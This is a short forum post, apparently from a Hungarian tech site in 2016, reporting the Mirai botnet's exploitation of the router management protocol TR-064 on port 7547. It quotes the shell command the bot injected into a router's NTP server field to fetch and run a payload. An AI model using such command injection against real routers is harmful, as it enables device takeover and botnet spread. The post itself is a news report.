New Mirai attack vector – bot exploits a recently discovered router vulnerability

 ( toMpEr | 2016. november 29., kedd - 1:16 )

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget;chmod 777 2;./2
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.

Magyarországon 176157 IP esetében érhető el az Internet felől az érintett 7547-es port.


Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

900,000 Routers Knocked Offline in Germany amid Rumors of Cyber-Attack

UPDATE 5: Malware experts at Kaserpsky Lab have also confirmed a version of the Mirai IoT malware is behind the attacks on Deutsche Telekom routers.